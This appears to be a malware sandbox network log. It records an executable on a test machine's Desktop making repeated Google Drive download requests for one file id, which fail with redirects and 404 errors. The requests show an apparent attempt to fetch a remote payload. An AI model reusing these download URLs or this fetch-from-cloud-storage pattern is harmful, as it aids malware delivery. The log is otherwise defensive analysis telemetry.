                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        41 | 192.168.11.20 | 49792 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:06:45 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:45 UTC | 1847 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:45 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-9iNSa6nnqSbIJLwkbGCOjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC7gqIBTFdEzzed3t-As8R23MnUqxAe8k55HwSVR_dzHwjUKVmPtbLIybjWQUBMpVhLX1ZE
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:06:45 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iEO6ssk5v2rez0NIoFWaug">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        42 | 192.168.11.20 | 49793 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:06:56 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:56 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:56 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-y6pLxwrmJ3hvtyfnJ8zUdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        43 | 192.168.11.20 | 49794 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:06:56 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:57 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:57 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-mpdCxqFwI6wT9LjjYOtFLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC68Z4rZQZ20kE5TPpoDQc7C4kBJqHtzGsbVDtl2F2dmCkRhPoWvXsRw1-kOAGGRxybYGyfIn1BZig
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:06:57 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-YPoGf9lLGjYMHQ2PBW6GA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        44 | 192.168.11.20 | 49795 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:07:07 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:07 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:07 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-gL7LpPyXXEXLwQLtBvh1gA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        45 | 192.168.11.20 | 49796 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:07:08 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:08 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:08 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-Cf9GuY1UAhc79GxP6I_Czw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC6h-yGpyTBYgXE3_1WIVD4kuckgTHVGSxZ3ZxtAX7T6LGcOY_w8040ucy3hZ-JMiSjwyO7LweRRww
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:07:08 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2QiNXdXNAQpCJnSs1ayfHg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        46 | 192.168.11.20 | 49797 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:07:18 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:19 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:18 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-VoRuib4s7-AH2UB-XRfauw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        47 | 192.168.11.20 | 49798 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:07:19 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:19 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:19 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-p4MEjeDn8eq7lz9hQjUC_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC4cutw_e6yuMkUxDL3Dm-QqjtqW3fJV2we6NAJx5JApZmdZUHFwgSXjmPodoOUeluqshdWG6CvSzA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:07:19 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a--E8PDxQVOo1h_SoYjtDg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        48 | 192.168.11.20 | 49799 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:07:29 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:30 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:30 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-1qwE3jGjk0kqjtfF7CUOOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        49 | 192.168.11.20 | 49800 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:07:30 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:30 UTC | 1847 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:30 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
